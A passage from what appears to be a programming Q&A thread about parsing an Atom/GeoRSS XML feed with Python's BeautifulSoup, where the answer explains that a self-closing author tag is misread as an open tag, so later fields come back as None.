<id>8</id> <georss:point>21.94420760726878 17.44</georss:point> <updated>2014-11-24T13:47:09.000Z</updated> <link href="http://192.168.1.12:8083/myWebApp/rest/listOfEntries/1/8" rel="self" type="application/atom+xml" length="0" /> <link href="http://192.168.1.12:8083/myWebApp/rest/listOfEntries/1/8/editEntry" rel="edit" type="application/atom+xml" length="0" /> <link href="http://192.168.1.12:8083/myWebApp/rest/listOfEntries/1/8/comments" rel="replies" type="application/atom+xml" length="0" /> </entry> <entry xmlns:georss="http://www.georss.org/georss"> <title type="html">TEST REST</title> <content type="html">1</content> <author> <name>User213</name> </author> <summary type="html">Test POST</summary> <id>12</id> <georss:point>21.94420760726878 17.44</georss:point> <updated>2014-11-25T14:29:02.000Z</updated> <link href="http://192.168.1.12:8083/myWebApp/rest/listOfEntries/1/12" rel="self" type="application/atom+xml" length="0" /> <link href="http://192.168.1.12:8083/myWebApp/rest/listOfEntries/1/12/editEntry" rel="edit" type="application/atom+xml" length="0" /> <link href="http://192.168.1.12:8083/myWebApp/rest/listOfEntries/1/12/comments" rel="replies" type="application/atom+xml" length="0" /> </entry> </feed> Python code: #!/usr/bin/python from BeautifulSoup import BeautifulSoup handler = open("/tmp/test.xml").read() results = soup.findAll('entry') for r in results: print r print r.find('title').text print r.find('content').text print r.find('georss:point') print r.find('id') print r.find('updated') And the output is the following: <entry xmlns:georss="http://www.georss.org/georss"> <title type="html">TEST REST</title> <content type="html">1</content> </entry> TEST REST 1 None None None <entry xmlns:georss="http://www.georss.org/georss"> <title type="html">TEST REST</title> <content type="html">1</content> <author> <name>User213</name> </author> <summary type="html">Test PUT Entry 8</summary> <id>8</id> <georss:point>21.94420760726878 17.44</georss:point> <updated>2014-11-24T13:47:09.000Z</updated> <link href="http://192.168.20.223:8083/myWebApp/rest/listOfEntries/1/8" rel="self" type="application/atom+xml" length="0" /> <link href="http://192.168.20.223:8083/myWebApp/rest/listOfEntries/1/8/editEntry" rel="edit" type="application/atom+xml" length="0" /> <link href="http://192.168.20.223:8083/myWebApp/rest/listOfEntries/1/8/comments" rel="replies" type="application/atom+xml" length="0" /> </entry> TEST REST 1 <georss:point>21.94420760726878 17.44</georss:point> <id>8</id> <updated>2014-11-24T13:47:09.000Z</updated> <entry xmlns:georss="http://www.georss.org/georss"> <title type="html">TEST REST</title> <content type="html">1</content> <author> <name>User213</name> </author> <summary type="html">Test POST</summary> <id>12</id> <georss:point>21.94420760726878 17.44</georss:point> <updated>2014-11-25T14:29:02.000Z</updated> <link href="http://192.168.20.223:8083/myWebApp/rest/listOfEntries/1/12" rel="self" type="application/atom+xml" length="0" /> <link href="http://192.168.20.223:8083/myWebApp/rest/listOfEntries/1/12/editEntry" rel="edit" type="application/atom+xml" length="0" /> <link href="http://192.168.20.223:8083/myWebApp/rest/listOfEntries/1/12/comments" rel="replies" type="application/atom+xml" length="0" /> </entry> TEST REST 1 <georss:point>21.94420760726878 17.44</georss:point> <id>12</id> <updated>2014-11-25T14:29:02.000Z</updated> Answer: From what I have tested with the following code : #!/usr/bin/python from BeautifulSoup import BeautifulSoup handler = open("./test.xml").read() soup = BeautifulSoup(handler) print soup.prettify() The ouput is like that : <?xml version='1.0' encoding='utf-8'?> <feed xmlns="http://www.w3.org/2005/Atom"> <title type="text"> News </title> <id> 1 </id> <link href="" /> <link href="http://192.168.1.12:8083/myWebApp/rest/listOfEntries/1/entries" rel="self" /> <updated> 2014-11-26T10:41:12.424Z </updated> <author> <entry xmlns:georss="http://www.georss.org/georss"> <title type="html"> TEST REST </title> <content type="html"> 1 </content> </entry> </author> <author> <name> User213 </name> </author> If you look closely you will see that in your xml the `<author />` is seen as an open tag by BeautifulSoup. That's why you he don't find title, content.. because for him they are out of the tag. Hope this`ll help